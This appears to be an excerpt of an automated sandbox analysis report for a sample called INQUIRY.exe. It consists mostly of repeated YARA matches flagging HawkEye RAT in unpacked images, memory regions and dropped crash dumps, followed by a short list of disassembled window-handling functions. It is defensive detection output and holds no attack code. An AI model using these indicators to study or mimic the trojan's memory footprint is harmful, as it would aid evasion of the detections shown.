                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004557F8 NtdllDefWindowProc_A,0_2_004557F8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_00456024
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0044A3C8 GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_0044A3C8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0043A6DC NtdllDefWindowProc_A,GetCapture,0_2_0043A6DC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0042E904 NtdllDefWindowProc_A,0_2_0042E904
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_00455F74
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004557F8 NtdllDefWindowProc_A,0_2_004557F8
